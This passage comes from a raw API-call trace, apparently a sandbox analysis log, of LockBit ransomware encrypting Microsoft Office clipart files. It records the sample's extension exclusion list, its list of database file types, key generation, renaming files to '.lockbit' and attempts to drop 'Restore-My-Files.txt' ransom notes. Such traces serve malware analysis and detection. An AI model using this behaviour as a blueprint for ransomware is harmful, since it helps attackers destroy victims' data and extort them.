office\\clipart\\pub60cor\\sl01394_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0173.848] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.848] malloc (_Size=0x40068) returned 0x3d70450 [0173.849] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=6916) returned 1 [0173.849] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.849] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0173.849] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.849] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0173.850] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.851] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01394_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01394_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.851] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.851] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.853] free (_Block=0x1fa2ed8) [0173.853] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01394_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.853] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.853] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.853] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x747f2b00, ftCreationTime.dwHighDateTime=0x1bd4bef, ftLastAccessTime.dwLowDateTime=0x5a980590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x747f2b00, ftLastWriteTime.dwHighDateTime=0x1bd4bef, nFileSizeHigh=0x0, nFileSizeLow=0x138c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SL01395_.WMF", cAlternateFileName="")) returned 1 [0173.853] lstrcmpiW (lpString1=".", lpString2="SL01395_.WMF") returned -1 [0173.853] lstrcmpiW (lpString1="..", lpString2="SL01395_.WMF") returned -1 [0173.853] PathFindExtensionW (pszPath="SL01395_.WMF") returned=".WMF" [0173.853] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.853] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.853] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.853] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.853] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.853] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.853] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.853] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.853] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.853] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.853] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.853] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.853] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.853] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.853] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.853] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.853] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.854] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.854] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SL01395_.WMF") returned -1 [0173.855] lstrcmpiW (lpString1="ntldr", lpString2="SL01395_.WMF") returned -1 [0173.855] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SL01395_.WMF") returned -1 [0173.855] lstrcmpiW (lpString1="bootsect.bak", lpString2="SL01395_.WMF") returned -1 [0173.855] lstrcmpiW (lpString1="autorun.inf", lpString2="SL01395_.WMF") returned -1 [0173.855] lstrcmpiW (lpString1="thumbs.db", lpString2="SL01395_.WMF") returned 1 [0173.855] lstrcmpiW (lpString1="iconcache.db", lpString2="SL01395_.WMF") returned -1 [0173.855] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.855] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01395_.WMF") returned=".WMF" [0173.855] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.855] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.855] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.856] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.856] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.856] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.856] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.856] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.856] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.856] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.856] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.856] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.856] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.856] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.856] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01395_.WMF.lockbit") returned 72 [0173.856] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01395_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl01395_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0173.860] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.860] malloc (_Size=0x40068) returned 0x1ff1e60 [0173.860] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5004) returned 1 [0173.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.860] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0173.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.860] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0173.861] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0173.862] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01395_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01395_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.862] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.862] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.864] free (_Block=0x1fa2ed8) [0173.864] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01395_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.864] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.864] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.864] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d2e6230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6cc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SL01565_.WMF", cAlternateFileName="")) returned 1 [0173.864] lstrcmpiW (lpString1=".", lpString2="SL01565_.WMF") returned -1 [0173.864] lstrcmpiW (lpString1="..", lpString2="SL01565_.WMF") returned -1 [0173.864] PathFindExtensionW (pszPath="SL01565_.WMF") returned=".WMF" [0173.864] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.864] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.864] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.864] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.864] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.864] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.864] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.864] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.864] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.864] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.864] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.864] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.864] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.864] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.864] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.864] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.865] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.865] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SL01565_.WMF") returned -1 [0173.866] lstrcmpiW (lpString1="ntldr", lpString2="SL01565_.WMF") returned -1 [0173.866] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SL01565_.WMF") returned -1 [0173.866] lstrcmpiW (lpString1="bootsect.bak", lpString2="SL01565_.WMF") returned -1 [0173.866] lstrcmpiW (lpString1="autorun.inf", lpString2="SL01565_.WMF") returned -1 [0173.866] lstrcmpiW (lpString1="thumbs.db", lpString2="SL01565_.WMF") returned 1 [0173.866] lstrcmpiW (lpString1="iconcache.db", lpString2="SL01565_.WMF") returned -1 [0173.866] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.866] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01565_.WMF") returned=".WMF" [0173.866] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.866] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.866] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.867] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.867] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.867] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.867] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.867] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.867] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.867] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.867] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.867] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.867] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.867] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.867] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.867] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01565_.WMF.lockbit") returned 72 [0173.867] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01565_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl01565_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0173.868] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.868] malloc (_Size=0x40068) returned 0x3e70008 [0173.868] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=27844) returned 1 [0173.868] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.868] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0173.869] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0173.869] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0173.872] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01565_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01565_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.872] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.872] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.873] free (_Block=0x1fa2ed8) [0173.873] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01565_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.873] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.873] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.873] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a6e400, ftCreationTime.dwHighDateTime=0x1bd4af7, ftLastAccessTime.dwLowDateTime=0x6d2e6230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8a6e400, ftLastWriteTime.dwHighDateTime=0x1bd4af7, nFileSizeHigh=0x0, nFileSizeLow=0x36aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00017_.WMF", cAlternateFileName="")) returned 1 [0173.873] lstrcmpiW (lpString1=".", lpString2="SO00017_.WMF") returned -1 [0173.873] lstrcmpiW (lpString1="..", lpString2="SO00017_.WMF") returned -1 [0173.873] PathFindExtensionW (pszPath="SO00017_.WMF") returned=".WMF" [0173.874] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.874] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.875] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".reg", 